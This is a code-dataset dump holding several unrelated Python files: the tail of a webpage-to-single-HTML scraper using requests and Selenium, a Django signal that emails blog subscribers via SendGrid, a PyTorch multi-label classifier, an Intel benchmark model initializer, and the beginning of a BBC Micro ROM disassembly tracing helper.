     verbose:\n        usecache:\n        verify:\n        ignore_error:\n        username:\n        password:\n        referer_url:\n\n    Returns:\n\n    \"\"\"\n\n    global webpage2html_cache\n    global site_id\n    global download_dir\n    global user_agent\n\n    if url.startswith('http') or (relpath and relpath.startswith('http')):\n        full_path = absurl(url, relpath)\n        if not full_path:\n            if verbose:\n                log(f'[ WARN ] invalid path, {url} {relpath}')\n            return '', None\n        # urllib2 only accepts valid url, the following code is taken from urllib\n        # http://svn.python.org/view/python/trunk/Lib/urllib.py?r1=71780&r2=71779&pathrev=71780\n        full_path = quote(full_path, safe=\"%/:=&?~#+!$,;'@()*[]\")\n        if usecache:\n            if full_path in webpage2html_cache:\n                if verbose:\n                    log(f'[ CACHE HIT ] - {full_path}')\n                return webpage2html_cache[full_path], None\n        headers = {\n            \"accept\": \"image/webp,image/*,*/*;q=0.8\",\n            \"accept-language\": \"ja,en-US;q=0.9,en;q=0.8\",\n            \"user-agent\": user_agent\n        }\n        if referer_url is not None and referer_url != \"\":\n            headers.update({\"referer\": referer_url})\n\n        auth = None\n        if username and password:\n            auth = requests.auth.HTTPBasicAuth(username, password)\n        try:\n            response = requests.get(full_path, headers=headers, verify=verify, auth=auth)\n            if verbose:\n                log('[ GET ] %d - %s' % (response.status_code, response.url))\n            if not ignore_error and (response.status_code >= 400 or response.status_code < 200):\n                content = ''\n            elif response.headers.get('content-type', '').lower().startswith('text/'):\n                content = response.text\n            else:\n                content = response.content\n            if usecache:\n                webpage2html_cache[response.url] = content\n            return content, {'url': response.url,\n                             'content-type': response.headers.get('content-type')}\n        except Exception as ex:\n            if verbose:\n                log(f'[ WARN ] ??? - {full_path}: {ex}')\n            return '', None\n    elif os.path.exists(url):\n        if relpath:\n            relpath = relpath.split('#')[0].split('?')[0]\n            if os.path.exists(relpath):\n                full_path = relpath\n            else:\n                full_path = os.path.normpath(os.path.join(os.path.dirname(url), relpath))\n            try:\n                ret = open(full_path, 'rb').read()\n                if verbose:\n                    log(f'[ LOCAL ] found - {full_path}')\n                return ret, None\n            except IOError as ex:\n                if verbose:\n                    msg = str(ex)\n                    log(f'[ WARN ] file not found - {full_path} {msg}')\n                return '', None\n        else:\n            try:\n                ret = open(url, 'rb').read()\n                if verbose:\n                    log(f'[ LOCAL ] found - {url}')\n                return ret, None\n            except IOError as err:\n                if verbose:\n                    msg = str(err)\n                    log(f'[ WARN ] file not found - {url} {msg}')\n                return '', None\n    else:\n        if verbose:\n            log(f'[ ERROR ] invalid index - {url}')\n        return '', None\n\n\ndef get_contents_by_selenium(url: str = None,\n                             relpath: str = None,\n                             verbose: bool = True,\n                             usecache: bool = True,\n                             verify: bool = True,\n                             ignore_error: bool = False,\n                             username: str = None,\n                             password: str = None,\n                             flg_screen_shot: bool = False,\n                             referer_url: str = \"\") -> tuple:\n    \"\"\"\n    Fetch web content using Selenium, optionally saving a screenshot\n\n    Args:\n        url:\n        relpath:\n        verbose:\n        usecache:\n        verify:\n        ignore_error:\n        username:\n        password:\n        flg_screen_shot:\n        referer_url:\n\n    Returns:\n\n    \"\"\"\n\n    global site_id\n    global download_dir\n    global webpage2html_cache\n    global user_agent\n    global getting_time\n\n    url = absurl(url, base_url)\n    full_path = quote(url, safe=\"%/:=&?~#+!$,;'@()*[]\")\n    if usecache:\n        if full_path in webpage2html_cache:\n            if verbose:\n                log(f'[ CACHE HIT ] - {full_path}')\n            return webpage2html_cache[full_path], {'url': url, 'content-type': \"text/html\"}\n\n    if not url.startswith(\"http\"):\n        if usecache:\n            contents = \"<!DOCTYPE html><html lang='en'>\" \\\n                       \"<head><meta charset='utf-8'><title>No title\" \\\n                       \"</title></head><body></body></html>\"\n            webpage2html_cache[full_path] = contents\n            return contents, {'url': url, 'content-type': \"text/html\"}\n\n    log(f\"[DEBUG] - Get by selenium: {url} as {site_id}\")\n    options = webdriver.ChromeOptions()\n    options.add_argument('--headless')\n    options.add_argument(\"--incognito\")\n    options.add_argument(\"--hide-scrollbars\")\n    options.add_argument(\"--test-type\")\n\n    if not chromedriver_binary:\n        return get_contents(url, referer_url=referer_url)\n    try:\n        with webdriver.Chrome(options=options) as driver:\n            try:\n                user_agent = driver.execute_script(\"return navigator.userAgent;\")\n                driver.set_window_size(1920, 1080)\n                driver.get(url)\n                if flg_screen_shot:\n                    width = driver.execute_script(\"return document.body.clientWidth;\")\n                    driver.set_window_size(max(width, 1920), 1080)\n                    time.sleep(1)\n                    height = driver.execute_script(\"\"\"\n                        var maxHeight = document.body.clientHeight;\n                        var childrenNodes = document.body.children;\n                        for (const num in childrenNodes) {\n                            if (! isNaN(childrenNodes[num].clientHeight)){\n                                if (childrenNodes[num].clientHeight >maxHeight)\n                                {maxHeight = childrenNodes[num].clientHeight;}\n                            }\n                        };\n                        return maxHeight;\"\"\")\n                    # log(height)\n                    driver.set_window_size(max(width, 1920), max(height, 1080))\n                    time.sleep(1)\n                    driver.execute_script(f\"window.scrollTo(0, {height})\")\n                    time.sleep(12)\n                    driver.execute_script(\"window.scrollTo(0, 0)\")\n                    time.sleep(1)\n                html_text = driver.page_source\n                driver.save_screenshot(f'{download_dir}/image/{site_id}_{getting_time}.png')\n            except TimeoutException as ex:\n                log(f\"[ERROR]\\tTimeoutException: '{ex}'\")\n                html_text = \"<!DOCTYPE html><html lang='en'>\" \\\n                            \"<head><meta charset='utf-8'><title>No title</title></head>\" \\\n                            \"<body></body></html>\"\n            else:\n                driver.quit()\n    except Exception as ex:\n        log(f\"[ERROR]\\twebdriver Chrome: '{ex}'\")\n        log(f\"[WARN]\\tGet web page by request without screenshot\")\n        return get_contents(url, referer_url=referer_url)\n\n    # If caching is enabled, store the fetched page in the cache.\n    if usecache:\n        webpage2html_cache[full_path] = html_text\n\n    return html_text, {'url': url, 'content-type': \"text/html\"}\n\n\ndef data_to_base64(index, src, verbose: bool = True, referer_url: str = None):\n    # doc here: http://en.wikipedia.org/wiki/Data_URI_scheme\n    sp = urlparse(src).path.lower()\n    if src.strip().startswith('data:'):\n        return src\n    elif src.strip().startswith('javascript:'):\n        return src\n\n    if sp.endswith('.png'):\n        fmt = 'image/png'\n    elif sp.endswith('.gif'):\n        fmt = 'image/gif'\n    elif sp.endswith('.ico'):\n        fmt = 'image/x-icon'\n    elif sp.endswith('.jpg') or sp.endswith('.jpeg'):\n        fmt = 'image/jpeg'\n    elif sp.endswith('.webp'):\n        fmt = 'image/webp'\n    elif sp.endswith('.svg'):\n        fmt = 'image/svg+xml'\n    elif sp.endswith('.ttf'):\n        fmt = 'application/x-font-ttf'\n    elif sp.endswith('.otf'):\n        fmt = 'application/x-font-opentype'\n    elif sp.endswith('.woff'):\n        fmt = 'application/font-woff'\n    elif sp.endswith('.woff2'):\n        fmt = 'application/font-woff2'\n    elif sp.endswith('.eot'):\n        fmt = 'application/vnd.ms-fontobject'\n    elif sp.endswith('.sfnt'):\n        fmt = 'application/font-sfnt'\n    elif sp.endswith('.css') or sp.endswith('.less') or src.startswith(\"https://fonts.googleapis.com/css\"):\n        fmt = 'text/css'\n    elif sp.endswith('.js'):\n        fmt = 'application/javascript'\n    elif sp.endswith(\".html\") or sp.endswith(\".htm\"):\n        fmt = \"text/html\"\n    elif sp.endswith(\".txt\") or sp.endswith(\".md\"):\n        fmt = \"text/text\"\n    elif sp.endswith(\".json\"):\n        fmt = \"application/json\"\n    else:\n        fmt = 'image/png'\n\n    # For html, fetch via Selenium; everything else goes through requests with a referer header.\n    if fmt == \"text/html\":\n        data, extra_data = get_contents_by_selenium(index, src, referer_url=referer_url)\n    else:\n        # log(f\"{index} , {sp} <- {src} as {fmt}\")\n        data, extra_data = get_contents(index, src, verbose=verbose, referer_url=referer_url)\n\n    if extra_data and extra_data.get('content-type'):\n        fmt = extra_data.get('content-type').strip().replace(' ', '')\n\n    if data:\n        # log(f\"{index}, {fmt}, {type(data)}\")\n        if isinstance(data, bytes):\n            # return f'data:{fmt};base64,' + bytes.decode(base64.b64encode(data))\n            return 
f'data:{fmt};base64,{base64.b64encode(data).decode(\"utf-8\")}'\n else:\n return f'data:{fmt};base64,{base64.b64encode(str.encode(data)).decode(\"utf-8\")}'\n else:\n return absurl(index, src)\n\n\ncss_encoding_re = re.compile(r'''@charset\\s+[\"']([-_a-zA-Z0-9]+)[\"'];''', re.I)\n\n\ndef handle_css_content(index, css, verbose=True, referer_url: str = None):\n if not css:\n return css\n if not isinstance(css, str):\n css = bytes.decode(css)\n mo = css_encoding_re.search(css)\n if mo:\n try:\n css = css.decode(mo.group(1))\n except Exception as ex:\n log(f'[WARN]\\tfailed to convert css to encoding {mo.group(1)}: {ex}')\n # Watch out! how to handle urls which contain parentheses inside? Oh god, css does not support such kind of urls\n # I tested such url in css, and, unfortunately, the css rule is broken. LOL!\n # I have to say that, CSS is awesome!\n reg = re.compile(r'url\\s*\\((.+?)\\)')\n\n def repl(matchobj) -> str:\n src = matchobj.group(1).strip(' \\'\"')\n # if src.lower().endswith('woff') or src.lower().endswith('ttf') \\\n # or src.lower().endswith('otf') or src.lower().endswith('eot'):\n # # dont handle font data uri currently\n # return 'url(' + src + ')'\n base64_str = data_to_base64(index, src, verbose=verbose, referer_url=referer_url)\n return f'url(\"{base64_str}\")'\n\n css = reg.sub(repl, css)\n return css\n\n\ndef generate(url,\n verbose=True,\n comment=True,\n keep_script=False,\n prettify=False,\n full_url=True,\n verify=True,\n errorpage=False,\n username=None, password=None,\n level: int = 1,\n **kwargs):\n \"\"\"\n given a index url such as http://www.google.com, http://custom.domain/index.html\n return generated single html\n \"\"\"\n\n global site_id\n global base_url\n global getting_time\n\n if level <= 1:\n base_url = url\n site_id = make_site_id(url)\n\n # html_doc, extra_data = get(index, verbose=verbose, verify=verify, ignore_error=errorpage,\n # username=username, password=password)\n #\n # if extra_data and extra_data.get('url'):\n # index = extra_data['url']\n\n html_doc, _ = get_contents_by_selenium(url, flg_screen_shot=True)\n referer_url = url\n\n # now build the dom tree\n # soup = BeautifulSoup(html_doc, 'lxml')\n soup = BeautifulSoup(html_doc, 'html5lib')\n soup_title = soup.title.string if soup.title else ''\n log(f\"[ INFO ] get {soup_title}\")\n\n for link in soup('link'):\n if link.get('href'):\n # add_links(absurl(url, link['href']))\n if 'mask-icon' in (link.get('rel') or []) or \\\n 'icon' in (link.get('rel') or []) or \\\n 'apple-touch-icon' in (link.get('rel') or []) or \\\n 'apple-touch-icon-precomposed' in (link.get('rel') or []):\n link['data-href'] = link['href']\n link['href'] = data_to_base64(url, link['href'], verbose=verbose)\n elif link.get('type') == 'text/css' or \\\n link['href'].lower().endswith('.css') or \\\n 'stylesheet' in (link.get('rel') or []):\n new_type = 'text/css' if not link.get('type') else link['type']\n css = soup.new_tag('style', type=new_type)\n css['data-href'] = link['href']\n for attr in link.attrs:\n if attr in ['href']:\n continue\n css[attr] = link[attr]\n\n css_data, _ = get_contents(url,\n relpath=link['href'],\n verbose=verbose,\n referer_url=referer_url)\n\n new_css_content = handle_css_content(absurl(url, link['href']),\n css_data,\n verbose=verbose,\n referer_url=referer_url)\n # if \"stylesheet/less\" in '\\n'.join(link.get('rel') or []).lower():\n # fix browser side less: http://lesscss.org/#client-side-usage\n # # link['href'] = 'data:text/less;base64,' + base64.b64encode(css_data)\n # 
link['data-href'] = link['href']\n                #     link['href'] = absurl(index, link['href'])\n                if False:  # new_css_content.find('@font-face') > -1 or new_css_content.find('@FONT-FACE') > -1:\n                    link['href'] = 'data:text/css;base64,' + base64.b64encode(new_css_content)\n                else:\n                    css.string = new_css_content\n                    link.replace_with(css)\n            elif full_url:\n                link['data-href'] = link['href']\n                link['href'] = absurl(url, link['href'])\n\n    # Extract Javascript\n    for js in soup('script'):\n        if not keep_script:\n            js.replace_with('')\n            continue\n        if not js.get('src'):\n            continue\n        new_type = 'text/javascript' if not js.has_attr('type') or not js['type'] else js['type']\n        code = soup.new_tag('script', type=new_type)\n        code['data-src'] = js['src']\n        js_str, _ = get_contents(url, relpath=js['src'], verbose=verbose, referer_url=referer_url)\n        if type(js_str) == bytes:\n            js_str = js_str.decode('utf-8')\n        try:\n            if js_str.find('</script>') > -1:\n                code['src'] = 'data:text/javascript;base64,' + base64.b64encode(js_str.encode()).decode()\n            elif js_str.find(']]>') < 0:\n                code.string = '<!--//--><![CDATA[//><!--\\n' + js_str + '\\n//--><!]]>'\n            else:\n                # replace ]]> does not work at all for chrome, do not believe\n                # http://en.wikipedia.org/wiki/CDATA\n                # code.string = '<![CDATA[' + js_str.replace(']]>', ']]]]><![CDATA[>') + '\\n]]>'\n                code.string = js_str\n        except Exception as ex:\n            if verbose:\n                log(f\"[ERROR]\\t{repr(js_str)}: {ex}\")\n            raise\n        js.replace_with(code)\n\n    # Fetch iframe contents\n    for i_frame in soup(\"iframe\"):\n        if i_frame.get('src'):\n            log(f\"[ DEBUG ] found iframe {i_frame['src']}\")\n            # log(absurl(url, i_frame['src']))\n            i_frame['data-src'] = i_frame['src']\n            if level <= 1:\n                i_frame_html = generate(i_frame['src'], level=level + 1, referer_url=referer_url)\n                add_links(absurl(url, i_frame['data-src']))\n            else:\n                i_frame_html = \"<!DOCTYPE html>\" \\\n                               \"<html lang='en'><head><meta charset='utf-8'>\" \\\n                               \"<title>Grandchild title</title>\" \\\n                               \"</head><body></body></html>\"\n            i_frame['src'] = 'data:text/html;base64,' + base64.b64encode(i_frame_html.encode()).decode()\n\n    # Fetch frame contents\n    for frame in soup(\"frame\"):\n        if frame.get('src'):\n            log(f\"[ DEBUG ] found frames {frame['src']}\")\n            frame['data-src'] = frame['src']\n            if level <= 1:\n                frame_html = generate(frame['src'], level=level + 1, referer_url=referer_url)\n                add_links(absurl(url, frame['data-src']))\n            else:\n                frame_html = \"<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'>\" \\\n                             \"<title>Grandchild title</title>\" \\\n                             \"</head><body></body></html>\"\n            frame['src'] = 'data:text/html;base64,' + base64.b64encode(frame_html.encode()).decode()\n    for img in soup('img'):\n        if not img.get('src'):\n            continue\n        img['data-src'] = img['src']\n        img['src'] = data_to_base64(url, img['src'], verbose=verbose)\n\n        # `img` elements may have `srcset` attributes with multiple sets of images.\n        # To get a lighter document it will be cleared, and only the standard `src` attribute is used.\n        # Maybe add a flag to enable the base64 conversion of each `srcset`?\n        # For now a simple warning is displayed informing that the image has multiple\n        # sources that are stripped.\n        if img.get('srcset'):\n            img['data-srcset'] = img['srcset']\n            del img['srcset']\n            if verbose:\n                log(f\"[ WARN ] srcset found in img tag. Attribute will be cleared. File src => {img['data-src']}\")\n\n        def check_alt(attr):\n            if img.has_attr(attr) and img[attr].startswith('this.src='):\n                # we do not handle this situation yet, just warn the user\n                if verbose:\n                    log(f'[ WARN ] {attr} found in img tag and unhandled, which may break page')\n\n        check_alt('onerror')\n        check_alt('onmouseover')\n        check_alt('onmouseout')\n\n    for tag in soup(True):\n        # Force the HTML character set to UTF-8\n        if tag.name == \"meta\" and tag.has_attr('charset') and tag['charset'].lower() != \"utf-8\":\n            tag[\"charset\"] = \"UTF-8\"\n        elif tag.name == \"meta\" and tag.has_attr('http-equiv') and tag['http-equiv'].lower() == \"content-type\" \\\n                and tag.has_attr('content'):\n            tag[\"content\"] = \"text/html; charset=UTF-8\"\n\n        # Extract links\n        if full_url and tag.name == 'a' and tag.has_attr('href') and not tag['href'].startswith('#'):\n            tag['data-href'] = tag['href']\n            tag['href'] = absurl(url, tag['href'])\n            add_links(tag['href'])\n\n        # Inline stylesheet content\n        if tag.has_attr('style'):\n            if tag['style']:\n                tag['style'] = handle_css_content(url, tag['style'], verbose=verbose)\n        elif tag.name == 'link' and tag.has_attr('type') and tag['type'] == 'text/css':\n            if tag.string:\n                tag.string = handle_css_content(url, tag.string, verbose=verbose)\n        elif tag.name == 'style':\n            if tag.string:\n                tag.string = handle_css_content(url, tag.string, verbose=verbose)\n\n    # Generate the output document\n    result = soup.prettify(formatter='html5')\n\n    # image/jpeg comes out as image/jpg, so put the proper MIME type back\n    result = result.replace(\"url(data:image/jpg;base64,\", \"url(data:image/jpeg;base64,\")\n\n    # Wrap CSS url(...) data URIs in quotes\n    result = re.sub(r'url\\s*\\((data:.+?)\\)', r'url(\"\\1\")', result)\n\n    if level > 1:\n        return soup.prettify(formatter='html5')\n    else:\n        html_file_path = f\"{download_dir}/html/{site_id}_{getting_time}.html\"\n        with open(html_file_path, 'w') as f:\n            f.write(result)\n\n        save_links()\n        save_url_id_list()\n\n\ndef save_links():\n    global external_links\n    global internal_links\n    global base_url\n    global getting_time\n\n    links = [base_url]\n    internal_links.sort()\n    for url in sorted(set(internal_links)):\n        if url not in links:\n            links.append(url)\n    for url in sorted(set(external_links)):\n        if url not in links:\n            links.append(url)\n\n    link_file_path = f\"{download_dir}/link/{site_id}_{getting_time}.txt\"\n    with open(link_file_path, 'w') as f:\n        f.write(\"\\n\".join(links))\n\n\ndef save_url_id_list():\n    global site_id\n    global base_url\n    global getting_time\n\n    link_file_path = f\"{download_dir}/url_id_list.txt\"\n    text = f\"{site_id}\\t{base_url}\\t{getting_time}\\n\"\n    with open(link_file_path, 'a') as f:\n        f.write(text)\n\n\ndef check_within_one_day(url):\n    global download_dir\n    global site_id\n    site_id = make_site_id(url)\n    files = Path(download_dir).glob(f\"**/{site_id}_*JST.*\")\n    now = datetime.now(timezone(timedelta(hours=+9), 'JST'))\n    for file in files:\n        m = re.search(r'(\\d{8}T\\d{6}JST)\\.(.+)$', str(file))\n        if m:\n            get_time = datetime.strptime(f\"{m.group(1)}\".replace(\"JST\", '+0900'), '%Y%m%dT%H%M%S%z')\n            td = now - get_time\n            if td.days < 1:\n                return True\n            else:\n                continue\n    return False\n\ndef short_cut(url):\n    global getting_time\n\n    # Skip if the page was already fetched within the last 24 hours.\n    if check_within_one_day(url):\n        print(\"24時間以内に取得したデータがあります.\")\n        return False\n\n    # Timestamp used in the output file names, in the format that\n    # check_within_one_day() parses back. This assignment appears to have\n    # been lost in the original source; restored here as an assumption.\n    getting_time = datetime.now(timezone(timedelta(hours=+9), 'JST')).strftime('%Y%m%dT%H%M%SJST')\n\n    generate(url)\n\n\ndef main():\n    fire.Fire(short_cut)\n\n\nif __name__ == \"__main__\":\n    
main()\n","sub_path":"webpage2html/webpage2html.py","file_name":"webpage2html.py","file_ext":"py","file_size_in_byte":26065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"324234698","text":"import os\n\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nfrom blog.models import Post\nfrom subscription.models import Subscription\n\n\n@receiver(post_save, sender=Post)\ndef send_email(sender, instance, **kwargs):\n # Get emails of subscribed users\n sub_emails = User.objects.filter(pk__in=Subscription.objects\n .filter(publisher__exact=instance.author)\n .values_list('subscriber_id')).values_list('email', flat=True)\n\n subject = 'New post | Django Boys Blog'\n text = '

Check new post by ' + instance.author.username + '

' + instance.title + ''\n message = Mail(\n from_email='info@djangoboysblog.com',\n subject=subject,\n html_content=text)\n # Add emails\n for to_email in sub_emails:\n message.add_to(to_email)\n try:\n sg = SendGridAPIClient(os.environ.get('SENDGRID_API_KEY'))\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n except Exception as e:\n print(e.message)\n\n pass\n","sub_path":"blog/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"219633915","text":"import sys\nfrom torchvision import transforms\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\nimport dataset_processing\nimport torch.optim as optim\nfrom torch.autograd import Variable\nimport torch\n\nclass MultiLabelNN(nn.Module):\n def __init__(self, nlabel):\n super(MultiLabelNN, self).__init__()\n self.nlabel = nlabel\n self.conv1 = nn.Conv2d(3, 6, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(6, 16, 5)\n self.fc1 = nn.Linear(179776, 1024)\n self.fc2 = nn.Linear(1024, nlabel)\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.pool(x)\n x = self.conv2(x)\n x = F.relu(x)\n # x = self.pool(x)\n x = x.view(-1, 179776)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x)\n return x\n\n\ndef main():\n \"\"\"Main Function\"\"\"\n DATA_PATH = 'data_original_named' # data_5classes\n TRAIN_DATA = 'train_img'\n TEST_DATA = 'test_img'\n\n # These are the actual strings the processing function should\n # look for in the filenames, in Ordner to create the target labels.\n #search_classes = [\"cat\", \"dog\", \"desert\", \"mountain\", \"sunset\"] \n search_classes = [\"desert\", \"mountains\", \"sea\", \"sunset\", \"trees\"] \n\n NLABELS = len(search_classes)\n batch_size = 16\n #kwargs = {} # für CPU\n #kwargs = {'num_workers': 1, 'pin_memory': True} # für GPU/CUDA\n\n transformations = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor()])\n\n\n dset_train = dataset_processing.DatasetProcessing(\n DATA_PATH,\n TRAIN_DATA,\n #TRAIN_IMG_FILE,\n #TRAIN_LABEL_FILE,\n search_classes,\n transformations\n )\n\n dset_test = dataset_processing.DatasetProcessing(\n DATA_PATH,\n TEST_DATA,\n #TEST_IMG_FILE,\n #TEST_LABEL_FILE,\n search_classes,\n transformations\n )\n\n train_loader = DataLoader(dset_train,\n batch_size=batch_size,\n shuffle=True,\n num_workers=4\n )\n\n test_loader = DataLoader(dset_test,\n batch_size=batch_size,\n shuffle=False,\n num_workers=4\n )\n\n\n use_gpu = torch.cuda.is_available()\n print(\"CUDA?: \", use_gpu)\n model = MultiLabelNN(NLABELS)\n if use_gpu:\n model = model.cuda()\n\n optimizer = optim.SGD(model.parameters(), lr=0.00001)\n criterion = nn.MultiLabelMarginLoss()\n\n epochs = 30\n for epoch in range(epochs):\n ### training phase\n #total_training_loss = 0.0\n # total = 0.0\n for iter, traindata in enumerate(train_loader, 0):\n train_inputs, train_labels = traindata\n if use_gpu:\n train_inputs, train_labels = Variable(train_inputs.cuda()), Variable(train_labels.cuda())\n else: train_inputs, train_labels = Variable(train_inputs), Variable(train_labels)\n\n optimizer.zero_grad()\n train_outputs = model(train_inputs)\n #print(\"Train Output is:\", train_outputs)\n #print(\"Train Labels is:\", train_labels)\n loss = criterion(train_outputs, train_labels)\n loss.backward()\n optimizer.step()\n\n # total += 
train_labels.size(0)\n #total_training_loss += loss.data[0]\n print('Training Phase: Epoch: [%2d][%2d/%2d]\\tIteration Loss: %.3f' %\n (iter, epoch, epochs, loss.data[0] / train_labels.size(0)))\n \n ### testing phase\n for iter, testdata in enumerate(test_loader, 0):\n test_inputs, test_labels = testdata\n if use_gpu:\n test_inputs, test_labels = Variable(test_inputs.cuda()), Variable(test_labels.cuda())\n else: test_inputs, test_labels = Variable(test_inputs), Variable(test_labels)\n\n test_outputs = model(test_inputs)\n test_loss = criterion(test_outputs, test_labels)\n print('Testing Phase: Epoch: [%2d][%2d/%2d]\\tIteration Loss: %.3f' %\n (iter, epoch, epochs, test_loss.data[0] / test_labels.size(0)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"multi_label_classifier.py","file_name":"multi_label_classifier.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"141987608","text":"#\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2019 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# SPDX-License-Identifier: EPL-2.0\n#\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom common.base_model_init import BaseModelInitializer\nfrom common.base_model_init import set_env_var\n\nimport os\n\n\nclass ModelInitializer(BaseModelInitializer):\n \"\"\"initialize model and run benchmark\"\"\"\n\n def __init__(self, args, custom_args=[], platform_util=None):\n super(ModelInitializer, self).__init__(args, custom_args, platform_util)\n\n # set num_inter_threads and num_intra_threads\n self.set_num_inter_intra_threads()\n\n # Set KMP env vars, if they haven't already been set\n self.set_kmp_vars(kmp_affinity=\"granularity=fine, compact, 1, 0\")\n set_env_var(\"KMP_HW_SUBSET\", \"1T\")\n\n benchmark_script = os.path.join(\n self.args.intelai_models, \"coco.py\")\n self.benchmark_command = self.get_numactl_command(args.socket_id) + \\\n self.python_exe + \" \" + benchmark_script + \" evaluate \"\n\n set_env_var(\"OMP_NUM_THREADS\", self.args.num_intra_threads)\n\n self.benchmark_command = self.benchmark_command + \\\n \" --dataset=\" + str(self.args.data_location) + \\\n \" --num_inter_threads \" + str(self.args.num_inter_threads) + \\\n \" --num_intra_threads \" + str(self.args.num_intra_threads) + \\\n \" --nw 5 --nb 50 --model=coco\" + \\\n \" --infbs \" + str(self.args.batch_size)\n\n def run(self):\n if self.benchmark_command:\n self.run_command(self.benchmark_command)\n","sub_path":"benchmarks/image_segmentation/tensorflow/maskrcnn/inference/fp32/model_init.py","file_name":"model_init.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"216924759","text":"from da65tracelib.label import Label\nfrom da65tracelib.mark import MarkType\nfrom da65tracelib.opcodes import JMP_ABS\nfrom da65tracelib.trace_info import 
TraceInfo\nfrom da65tracelib.utils import isprintable\nfrom itertools import takewhile\n\n#from mark import MarkType\nfrom da65tracelib.trace_error import TraceError  # assumed module path; TraceError is raised below but its import was commented out\n\nROM_LOAD_ADDRESS = 0x8000\n\nROM_TYPE_FLAG_SERVICE = \"service\"\nROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS = \"has_relocation_address\"\nROM_TYPE_FLAGS = {\n    ROM_TYPE_FLAG_SERVICE: 0b10000000,\n    \"language\": 0b01000000,\n    ROM_TYPE_FLAG_HAS_RELOCATION_ADDRESS: 0b00100000,\n    \"supports_firm_keys\": 0b00010000\n}\n\nROM_TYPE_ARCHITECTURE_6502_CODE = \"6502_code\"\nROM_TYPE_ARCHITECTURES = {\n    \"6502_basic_rom_code\": 0b0000,\n    \"reserved0\": 0b0001,\n    ROM_TYPE_ARCHITECTURE_6502_CODE: 0b0010,\n    \"68000_code\": 0b0011,\n    \"z80_code\": 0b1000,\n    \"32016_code\": 0b1001,\n    \"reserved1\": 0b1010,\n    \"80186_code\": 0b1011,\n    \"80286_code\": 0b1100,\n    \"arm_code\": 0b1101\n}\n\ndef read_int(e, byte_count):\n    value = 0\n    offset = None\n    for i in range(0, byte_count):\n        next_offset, temp = e.next()\n        if offset is None:\n            offset = next_offset\n\n        value += (temp << (i * 8))\n    return offset, value\n\ndef read_byte(e): return read_int(e, 1)\n\ndef read_word(e): return read_int(e, 2)\n\ndef read_dword(e): return read_int(e, 4)\n\ndef read_metadata_jump(trace_info, e, name):\n    offset, opcode = e.next()\n    _, jump_address = read_word(e)\n    if opcode == JMP_ABS:\n        trace_info.entry_points.append(jump_address)\n        trace_info.labels.append(Label(name, jump_address))\n        trace_info.mark_range(offset, 3, MarkType.code)\n    else:\n        trace_info.mark_range(offset, 3, MarkType.data)\n    return jump_address\n\ndef read_metadata_string(trace_info, e, name):\n    def translate_str(data):\n        return \"\".join(map(lambda x: chr(x) if isprintable(x) else \".\", data))\n\n    items = list(takewhile(lambda x: x[1] != 0, e))\n    offset, value = items[0]\n    trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, len(items) + 1))\n    trace_info.mark_range(offset, len(items) + 1, MarkType.text)\n    value = translate_str([item[1] for item in items])\n    return value\n\ndef read_metadata_byte(trace_info, e, name, convert_value=None, format_comment=None):\n    offset, value = read_byte(e)\n    value = value if convert_value is None else convert_value(value)\n    comment = None if format_comment is None else (format_comment(value) if callable(format_comment) else format_comment)\n    trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, None, comment))\n    return value\n\ndef read_metadata_dword(trace_info, e, name, convert_value=None, format_comment=None):\n    offset, value = read_dword(e)\n    value = value if convert_value is None else convert_value(value)\n    comment = None if format_comment is None else (format_comment(value) if callable(format_comment) else format_comment)\n    trace_info.labels.append(Label(name, ROM_LOAD_ADDRESS + offset, None, comment))\n    return value\n\ndef translate_rom_type_flags(value):\n    flags = []\n    for key in ROM_TYPE_FLAGS:\n        mask = ROM_TYPE_FLAGS[key]\n        if (value & mask) != 0:\n            flags.append(key)\n\n    architecture = value & 0b1111\n    for key in ROM_TYPE_ARCHITECTURES:\n        mask = ROM_TYPE_ARCHITECTURES[key]\n        if architecture == mask:\n            flags.append(key)\n            break\n\n    return flags\n\ndef add_common_labels(trace_info):\n    labels = [\n        (\"OSRDRM\", 0xFFB9, None),\n        (\"OSEVEN\", 0xFFBF, None),\n        (\"GSINIT\", 0xFFC2, None),\n        (\"GSREAD\", 0xFFC5, None),\n        (\"OSFIND\", 0xFFCE, None),\n        (\"OSGBPB\", 0xFFD1, None),\n        (\"OSBPUT\", 0xFFD4, None),\n        (\"OSBGET\", 0xFFD7, None),\n        (\"OSARGS\", 0xFFDA, None),\n        (\"OSFILE\", 0xFFDD, None),\n        (\"OSRDCH\", 0xFFE0, None),\n        (\"OSASCI\", 0xFFE3, None),\n        
